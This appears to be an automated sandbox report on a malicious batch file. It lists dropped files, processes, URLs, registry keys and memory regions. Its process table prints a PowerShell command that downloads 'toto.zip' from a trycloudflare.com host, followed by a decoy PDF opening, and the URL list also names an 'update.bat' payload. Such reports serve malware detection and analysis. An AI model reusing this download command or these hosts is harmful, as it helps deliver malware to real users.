Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
tue.bat
|
Unicode text, UTF-8 text, with very long lines (1432), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\240a9e19-10ee-407b-85fc-8588ca98609e.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5de1ef.TMP (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e3a50815-4691-4e7c-b207-6816fd8b5e5c.tmp
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 15
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7204
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSIcd707.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12vwqu45.q23.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asfxedrt.wct.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_im3gwrfy.zvn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3ouqwti.wta.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 13-47-15-303.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\495ac358-139b-4377-a75b-fa8980d8a934.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\6e1cd552-e4fe-4ac9-adb0-246bce765804.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\900550a3-c69c-4aaa-9612-8e95ca683a39.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\bef65abf-e021-41a7-9ebe-7522f5564ccb.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip'
} catch { exit 1 }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip'
} catch { exit 1 }"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084
--field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/
|
unknown
|
|
|
|
https://michael-scanned-motherboard-reforms.trycloud
|
unknown
|
|
|
|
https://michael-scanned-motherboard-reforms.trycloudflare.com
|
unknown
|
|
|
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip=
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip~
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/update.bat
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipy
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipr
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipaA
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/34e089
|
unknown
|
||
|
https://www.adobe.co
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipV
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip7u
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
michael-scanned-motherboard-reforms.trycloudflare.com
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
|
217.20.57.18
|
||
|
x1.i.lencr.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
96.7.168.138
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
54CA23E000
|
stack
|
page read and write
|
||
|
1B7CC340000
|
heap
|
page read and write
|
||
|
7FFA9FBCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AB0F77000
|
heap
|
page read and write
|
||
|
1B7B3B20000
|
heap
|
page execute and read and write
|
||
|
17A96EF7000
|
heap
|
page read and write
|
||
|
1B7CBD1D000
|
heap
|
page read and write
|
||
|
7FFA9FF10000
|
trusted library allocation
|
page read and write
|
||
|
779113B000
|
stack
|
page read and write
|
||
|
1B7CBBB3000
|
heap
|
page read and write
|
||
|
17A96ED6000
|
heap
|
page read and write
|
||
|
17AB1030000
|
heap
|
page read and write
|
||
|
7FFA9FD60000
|
trusted library allocation
|
page read and write
|
||
|
1B7B5420000
|
trusted library allocation
|
page read and write
|
||
|
54CA2BF000
|
stack
|
page read and write
|
||
|
7FFA9FF20000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1C8E000
|
heap
|
page read and write
|
||
|
1B7B3654000
|
heap
|
page read and write
|
||
|
7FFB0B610000
|
unkown
|
page readonly
|
||
|
1B7B39C0000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBCFC000
|
heap
|
page read and write
|
||
|
7FFA9FD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7C3C27000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FEA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FDF0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1E60000
|
heap
|
page read and write
|
||
|
7FFA9FEC0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1CB5000
|
heap
|
page read and write
|
||
|
7FFA9FEB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FCE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7790AFD000
|
stack
|
page read and write
|
||
|
1B7B3656000
|
heap
|
page read and write
|
||
|
1B7CBDB7000
|
heap
|
page read and write
|
||
|
58497F000
|
stack
|
page read and write
|
||
|
54CAE0E000
|
stack
|
page read and write
|
||
|
779103E000
|
stack
|
page read and write
|
||
|
779075F000
|
stack
|
page read and write
|
||
|
7FFA9FE80000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FC7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
77910BE000
|
stack
|
page read and write
|
||
|
1B7B1E20000
|
heap
|
page read and write
|
||
|
7FFA9FD7A000
|
trusted library allocation
|
page read and write
|
||
|
17A988D3000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1E00000
|
heap
|
page read and write
|
||
|
1B7B1C20000
|
heap
|
page read and write
|
||
|
7FFB0B630000
|
unkown
|
page read and write
|
||
|
7791B8D000
|
stack
|
page read and write
|
||
|
1B7B5596000
|
trusted library allocation
|
page read and write
|
||
|
17AB0EF3000
|
heap
|
page read and write
|
||
|
7FFA9FEA0000
|
trusted library allocation
|
page read and write
|
||
|
54CAD8E000
|
stack
|
page read and write
|
||
|
7790F3E000
|
stack
|
page read and write
|
||
|
1B7CBCED000
|
heap
|
page read and write
|
||
|
17A97210000
|
heap
|
page read and write
|
||
|
7FFB0B632000
|
unkown
|
page readonly
|
||
|
7FFA9FD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FE90000
|
trusted library allocation
|
page read and write
|
||
|
17A96F8E000
|
heap
|
page read and write
|
||
|
15366AA8000
|
heap
|
page read and write
|
||
|
17A96E60000
|
heap
|
page read and write
|
||
|
7FFA9FBC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FBC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7B1CFD000
|
heap
|
page read and write
|
||
|
1B7CBE86000
|
heap
|
page execute and read and write
|
||
|
7FFA9FDC0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3BB1000
|
trusted library allocation
|
page read and write
|
||
|
7790DB7000
|
stack
|
page read and write
|
||
|
17A98EA1000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBDC0000
|
heap
|
page execute and read and write
|
||
|
7FFA9FC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
54C9D7E000
|
stack
|
page read and write
|
||
|
1B7CBF94000
|
heap
|
page read and write
|
||
|
7FFA9FC70000
|
trusted library allocation
|
page read and write
|
||
|
54C9E7F000
|
stack
|
page read and write
|
||
|
1B7B5729000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3C2E000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FBD0000
|
trusted library allocation
|
page read and write
|
||
|
7790C7E000
|
stack
|
page read and write
|
||
|
17A96F0F000
|
heap
|
page read and write
|
||
|
1B7B39A0000
|
trusted library allocation
|
page read and write
|
||
|
17A98D37000
|
heap
|
page execute and read and write
|
||
|
7791B0F000
|
stack
|
page read and write
|
||
|
15368380000
|
heap
|
page read and write
|
||
|
17AB0EF1000
|
heap
|
page read and write
|
||
|
17AB11FB000
|
heap
|
page read and write
|
||
|
7FFA9FE70000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FDC0000
|
trusted library allocation
|
page read and write
|
||
|
17A9AAE2000
|
trusted library allocation
|
page read and write
|
||
|
17AA905A000
|
trusted library allocation
|
page read and write
|
||
|
17A98910000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE00000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1CB9000
|
heap
|
page read and write
|
||
|
7FFA9FE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FF00000
|
trusted library allocation
|
page read and write
|
||
|
54C9C7E000
|
stack
|
page read and write
|
||
|
7FFA9FDE0000
|
trusted library allocation
|
page read and write
|
||
|
54CAE8D000
|
stack
|
page read and write
|
||
|
5848FF000
|
stack
|
page read and write
|
||
|
54CA03E000
|
stack
|
page read and write
|
||
|
17A98D40000
|
heap
|
page read and write
|
||
|
17A98E90000
|
heap
|
page execute and read and write
|
||
|
7FFA9FBCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7790E3A000
|
stack
|
page read and write
|
||
|
17A988D0000
|
trusted library allocation
|
page read and write
|
||
|
7790A7E000
|
stack
|
page read and write
|
||
|
1B7CBE80000
|
heap
|
page execute and read and write
|
||
|
7FFA9FBC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7B1C7A000
|
heap
|
page read and write
|
||
|
17A97214000
|
heap
|
page read and write
|
||
|
7FFA9FCA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB0B630000
|
unkown
|
page read and write
|
||
|
17A96EEE000
|
heap
|
page read and write
|
||
|
7FFA9FE20000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBCC0000
|
heap
|
page read and write
|
||
|
17A96EF5000
|
heap
|
page read and write
|
||
|
1B7B3DE3000
|
trusted library allocation
|
page read and write
|
||
|
15366BA0000
|
heap
|
page read and write
|
||
|
1B7C3BC1000
|
trusted library allocation
|
page read and write
|
||
|
17AA8EA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FD7A000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FD90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FCA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FD71000
|
trusted library allocation
|
page read and write
|
||
|
17A9A493000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE60000
|
trusted library allocation
|
page read and write
|
||
|
17A96E40000
|
heap
|
page read and write
|
||
|
17A990D2000
|
trusted library allocation
|
page read and write
|
||
|
1B7B57F2000
|
trusted library allocation
|
page read and write
|
||
|
17AB0F85000
|
heap
|
page read and write
|
||
|
17A98F29000
|
trusted library allocation
|
page read and write
|
||
|
7790D3E000
|
stack
|
page read and write
|
||
|
17AB1204000
|
heap
|
page read and write
|
||
|
17AB121B000
|
heap
|
page read and write
|
||
|
17A98924000
|
heap
|
page read and write
|
||
|
7FFA9FEE0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3650000
|
heap
|
page read and write
|
||
|
7FFA9FEB0000
|
trusted library allocation
|
page read and write
|
||
|
7790FBF000
|
stack
|
page read and write
|
||
|
7FFA9FEF0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C3D69000
|
trusted library allocation
|
page read and write
|
||
|
17AB0EA5000
|
heap
|
page read and write
|
||
|
1B7CBFEC000
|
heap
|
page read and write
|
||
|
17A98926000
|
heap
|
page read and write
|
||
|
7FFA9FE30000
|
trusted library allocation
|
page read and write
|
||
|
7790B7E000
|
stack
|
page read and write
|
||
|
17AB0F7E000
|
heap
|
page read and write
|
||
|
17A96EC2000
|
heap
|
page read and write
|
||
|
7FFA9FDB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7CBEB3000
|
heap
|
page read and write
|
||
|
1B7B51A0000
|
trusted library allocation
|
page read and write
|
||
|
17A98880000
|
trusted library allocation
|
page read and write
|
||
|
17A96EFD000
|
heap
|
page read and write
|
||
|
54C9FF9000
|
stack
|
page read and write
|
||
|
1B7B3A13000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBF90000
|
heap
|
page read and write
|
||
|
17AB0EA0000
|
heap
|
page read and write
|
||
|
7FFB0B611000
|
unkown
|
page execute read
|
||
|
17A98920000
|
heap
|
page read and write
|
||
|
1B7CC002000
|
heap
|
page read and write
|
||
|
1B7B3A50000
|
trusted library allocation
|
page read and write
|
||
|
17AB0F56000
|
heap
|
page read and write
|
||
|
1B7B1C6E000
|
heap
|
page read and write
|
||
|
1B7B57EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FD60000
|
trusted library allocation
|
page read and write
|
||
|
77906D3000
|
stack
|
page read and write
|
||
|
7FFA9FF00000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBEB0000
|
heap
|
page read and write
|
||
|
7FFA9FBC4000
|
trusted library allocation
|
page read and write
|
||
|
54CA1B9000
|
stack
|
page read and write
|
||
|
1B7B54A7000
|
trusted library allocation
|
page read and write
|
||
|
17AB0F5D000
|
heap
|
page read and write
|
||
|
17A96FA4000
|
heap
|
page read and write
|
||
|
17A99AD2000
|
trusted library allocation
|
page read and write
|
||
|
17AB11DD000
|
heap
|
page read and write
|
||
|
7FFA9FED0000
|
trusted library allocation
|
page read and write
|
||
|
17A9AAE6000
|
trusted library allocation
|
page read and write
|
||
|
17A98D51000
|
heap
|
page read and write
|
||
|
1B7B3610000
|
heap
|
page read and write
|
||
|
1B7C3C33000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FBC2000
|
trusted library allocation
|
page read and write
|
||
|
1B7B47E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE70000
|
trusted library allocation
|
page read and write
|
||
|
1B7CC000000
|
heap
|
page read and write
|
||
|
1B7B1E64000
|
heap
|
page read and write
|
||
|
7790BFE000
|
stack
|
page read and write
|
||
|
1B7CBF9A000
|
heap
|
page read and write
|
||
|
7FFB0B635000
|
unkown
|
page readonly
|
||
|
7FFA9FD71000
|
trusted library allocation
|
page read and write
|
||
|
17A96E30000
|
heap
|
page read and write
|
||
|
54C9CFF000
|
stack
|
page read and write
|
||
|
7FFA9FE90000
|
trusted library allocation
|
page read and write
|
||
|
153684E0000
|
heap
|
page read and write
|
||
|
17A9AA1C000
|
trusted library allocation
|
page read and write
|
||
|
17A96EF9000
|
heap
|
page read and write
|
||
|
54CA0B7000
|
stack
|
page read and write
|
||
|
7FFA9FE40000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FD90000
|
trusted library allocation
|
page execute and read and write
|
||
|
54CA13D000
|
stack
|
page read and write
|
||
|
1B7B3BA0000
|
heap
|
page read and write
|
||
|
153669C0000
|
heap
|
page read and write
|
||
|
7FFA9FC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FDD0000
|
trusted library allocation
|
page read and write
|
||
|
1B7C3BB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FBDB000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBD7F000
|
heap
|
page read and write
|
||
|
17A9A714000
|
trusted library allocation
|
page read and write
|
||
|
54C99E3000
|
stack
|
page read and write
|
||
|
7FFA9FEE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FCE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FE20000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FBC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE80000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBD1F000
|
heap
|
page read and write
|
||
|
17A98890000
|
heap
|
page readonly
|
||
|
1B7B544B000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FDD0000
|
trusted library allocation
|
page read and write
|
||
|
17AA8F17000
|
trusted library allocation
|
page read and write
|
||
|
17AB0F4D000
|
heap
|
page read and write
|
||
|
7FFA9FF20000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE50000
|
trusted library allocation
|
page read and write
|
||
|
54C9F7D000
|
stack
|
page read and write
|
||
|
7FFA9FC70000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1C30000
|
heap
|
page read and write
|
||
|
17AA8EB0000
|
trusted library allocation
|
page read and write
|
||
|
17A96F35000
|
heap
|
page read and write
|
||
|
1B7CBFF6000
|
heap
|
page read and write
|
||
|
7FFA9FBD0000
|
trusted library allocation
|
page read and write
|
||
|
17A9A740000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FC76000
|
trusted library allocation
|
page read and write
|
||
|
17AB120D000
|
heap
|
page read and write
|
||
|
17A98830000
|
heap
|
page read and write
|
||
|
7FFA9FDA2000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE30000
|
trusted library allocation
|
page read and write
|
||
|
17A98860000
|
trusted library allocation
|
page read and write
|
||
|
17AB0F2F000
|
heap
|
page read and write
|
||
|
54C9EFE000
|
stack
|
